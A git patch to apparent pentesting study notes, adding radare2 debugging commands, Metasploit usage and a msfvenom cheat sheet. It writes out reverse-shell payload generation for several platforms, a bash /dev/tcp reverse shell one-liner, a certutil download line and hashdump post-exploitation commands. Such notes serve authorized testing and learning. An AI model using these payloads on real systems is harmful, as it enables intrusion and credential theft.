From 3800d3b2470abecffb4d744f62e7f3e7f69db207 Mon Sep 17 00:00:00 2001 From: whx Date: Mon, 27 Sep 2021 00:48:14 +0200 Subject: [PATCH] bump --- exploit/binaries/r2.md | 22 +++++++++++++++- metasploit.md | 23 +++++++++++++++++ pentesting.md | 1 + reverse_shells/docs/msfvenom.md | 45 ++++++++++++++++++++++++++++----- 4 files changed, 83 insertions(+), 8 deletions(-) diff --git a/exploit/binaries/r2.md b/exploit/binaries/r2.md index 7a21014..db8f289 100644 --- a/exploit/binaries/r2.md +++ b/exploit/binaries/r2.md @@ -1,7 +1,7 @@ # Radare2 ## Usage -### Dynamic +### Debug ```sh r2 -d ``` @@ -25,7 +25,27 @@ px @rbp-0x4 ```sh dc ``` +* Step +```sh +ds +``` * Show registers ```sh dr ``` +* Restart +```sh +ood +``` + +## AT&T Instructions +* leaq src, dst: this instruction sets dst to the address denoted by the expression in src +* addq src, dst: dst = dst + src +* subq src, dst: dst = dst - src +* imulq src, dst: dst = dst * src +* salq src, dst: dst = dst << src +* sarq src, dst: dst = dst >> src +* xorq src, dst: dst = dst XOR src +* andq src, dst: dst = dst & src +* orq src, dst: dst = dst | src + diff --git a/metasploit.md b/metasploit.md index 5ee0844..2c3a0bd 100644 --- a/metasploit.md +++ b/metasploit.md @@ -49,3 +49,26 @@ search portscan * Show `hosts` * Show `services` * Set RHOST values via `hosts -R` + +## Exploits +* `show targets` +* `show payloads` + +## Reverse Shells +* Multihandler, set options +```sh +use exploit/multi/handler +set payload +``` +* Shellshock as an example +```sh +use multi/http/apache_mod_cgi_bash_env_exec +``` + +## Post Exploitation +* Windows + * `load kiwi` + * `hashdump` +* Linux + * `use post/linux/gather/hashdump` + diff --git a/pentesting.md b/pentesting.md index c1026ba..f37e0ee 100644 --- a/pentesting.md +++ b/pentesting.md @@ -1,4 +1,5 @@ # Pentesting +* [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) Authorized audit of security systems of computers and networks. * [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) * Permissions diff --git a/reverse_shells/docs/msfvenom.md b/reverse_shells/docs/msfvenom.md index 6c0a5e4..ed894d2 100644 --- a/reverse_shells/docs/msfvenom.md +++ b/reverse_shells/docs/msfvenom.md @@ -1,11 +1,21 @@ # msfvenom usage -```msfvenom -p ``` +``` +msfvenom -p +``` * syntax -```//``` - * stageless ```linux/x86/shell_reverse_tcp``` - * staged ```linux/x86/shell/reverse_tcp``` +``` +// +``` + * stageless + ``` + linux/x86/shell_reverse_tcp + ``` + * staged + ``` + linux/x86/shell/reverse_tcp + ``` ## Windows ### x64 Reverse Shell in exe format @@ -44,12 +54,33 @@ certutil -urlcache -split -f http://:/shell.exe ## Unix ### netcat reverse -```msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT= R``` +```sh +msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT= R +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o shell.elf +``` * Alternatively, not msfvenom -```bash -c "bash -i >& /dev/tcp// 0>&1"``` +```sh +bash -c "bash -i >& /dev/tcp// 0>&1" +``` ### Include into Python Exploit as hex ```sh -msfvenom -p windows/shell_reverse_tcp LHOST=10.9.7.193 LPORT=4444 EXITFUNC=thread -b "\x00" -f py +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b "\x00" -f py +``` + +## PHP +```sh +msfvenom -p php/reverse_shell LHOST= lPORT=4444 -f raw > reverse_shell.php +``` +* Enclose raw file inside `` tags + +## ASP +```sh +msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -o rev_shell.asp +``` + +## Python +```sh +msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f python -o reverse_shell.python ```